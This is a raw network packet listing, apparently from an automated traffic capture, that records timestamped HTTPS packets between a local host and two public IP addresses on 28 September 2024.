Sep 28, 2024 05:23:44.147011995 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.147018909 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.147027016 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.147056103 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.147489071 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.147521019 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.147543907 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.147553921 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.147567034 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.147586107 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.148286104 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.148425102 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.148437977 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.148446083 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.148477077 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.148493052 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.148534060 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.150052071 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.150099993 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.150125980 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.150134087 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.150141001 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.150158882 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.150178909 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.150238991 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.150273085 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.150325060 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.150366068 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.151043892 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.151094913 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.151097059 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.151103020 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.151132107 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.151160002 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.151201963 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.151952982 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.151984930 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.152005911 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.152014017 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.152025938 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.152046919 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.152046919 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.152055979 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.152085066 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.152786970 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.152848005 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.153168917 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.153228045 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.186645031 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.186700106 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.186791897 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.186803102 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.186820030 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.186841965 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.232714891 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.232773066 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.232815981 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.232836008 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.232856035 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.232872009 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233040094 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233062029 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233103037 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233108044 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233141899 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233414888 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233428955 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233479977 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233485937 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233511925 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233527899 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233721972 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233735085 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233787060 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.233792067 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.233824015 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.237644911 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.237663031 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.237729073 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.237736940 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.237766981 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.237941027 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.237955093 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.237993956 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.237998962 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.238023996 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.238495111 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.238512039 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.238545895 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.238550901 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.238574028 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.238593102 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.273250103 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.273279905 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.273492098 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.273509026 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.273549080 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.319663048 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319680929 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319787025 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.319802999 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319839954 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.319904089 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319919109 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319948912 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319966078 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.319972038 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.319993973 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.320012093 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.320031881 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.320096970 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.320821047 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.320836067 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.443388939 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.443444014 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.443546057 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.443775892 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.443793058 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.971170902 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.971282959 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.971752882 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.971765041 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.973726988 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.973738909 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:45.091706991 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.091753006 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.091820002 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.092912912 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.092927933 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.558620930 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.558696985 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.560269117 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.560285091 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.560528040 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.606468916 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.606468916 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.606626987 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.707897902 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.707942009 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.707979918 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.708039999 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.708065987 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.708112955 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.708118916 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.708188057 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.708261967 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.710706949 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.710740089 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.710751057 CEST	49737	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.710756063 CEST	443	49737	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.758199930 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.758249044 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.758333921 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.758680105 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:45.758693933 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:45.927959919 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:45.928050995 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:45.928093910 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:45.928112984 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:45.928164959 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:45.928316116 CEST	49736	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:45.928338051 CEST	443	49736	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:45.930129051 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:45.930159092 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:45.930246115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:45.930730104 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:45.930742979 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.232803106 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.233021021 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.234172106 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.234179974 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.234422922 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.235775948 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.235800982 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.235846996 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.387923002 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.388046980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.388597012 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.388611078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.388767004 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.388772011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534111977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534168005 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534218073 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534250021 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534287930 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534318924 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534338951 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.534353971 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534368992 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.534394026 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.534409046 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.534728050 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.535473108 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.535537004 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.535559893 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.536088943 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.539942026 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.540004969 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.620827913 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.620918036 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.620939970 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.621160030 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.621160030 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.621190071 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.621558905 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.621591091 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.621615887 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.621624947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.621634960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.621665955 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.621673107 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.622353077 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.622385025 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.622406960 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.622414112 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.622438908 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.622453928 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.622458935 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.622497082 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.622503042 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.622544050 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.623187065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.623231888 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.623286009 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.623325109 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.623331070 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.623368979 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.623373985 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.623411894 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.624150038 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.624191999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.624197006 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.624236107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.624238968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.624250889 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.624275923 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.624304056 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.624309063 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.624520063 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.625000954 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.625057936 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.627468109 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.627540112 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.702169895 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.702265978 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.702460051 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.702575922 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.702585936 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.702596903 CEST	49738	443	192.168.2.6	188.114.97.3
Sep 28, 2024 05:23:46.702601910 CEST	443	49738	188.114.97.3	192.168.2.6
Sep 28, 2024 05:23:46.707564116 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.707632065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.707678080 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.707700014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.707707882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.707741022 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.707753897 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.707854033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.707952023 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708002090 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.708008051 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708035946 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708067894 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708086014 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.708092928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708101988 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.708132982 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.708885908 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708935022 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708950043 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.708955050 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.708977938 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.708996058 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.709476948 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.709515095 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.709533930 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.709539890 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.709561110 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.709583998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.709584951 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.709599972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.709629059 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.709654093 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.710191965 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.710242987 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.710248947 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.710256100 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.710287094 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.710349083 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.710378885 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.710396051 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.710402012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.710421085 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.710438967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.711157084 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.711205959 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.711215019 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.711263895 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794531107 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794584990 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794594049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794604063 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794629097 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794660091 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794747114 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794776917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794786930 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794792891 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794812918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794826031 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794830084 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794836998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794874907 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.794908047 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.794958115 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795084000 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795130968 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795180082 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795231104 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795264006 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795309067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795361996 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795414925 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795496941 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795541048 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795599937 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795634031 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795656919 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795663118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:46.795686007 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795706034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:46.795975924 CEST	443	49739	172.67.167.90	192.168.2.6
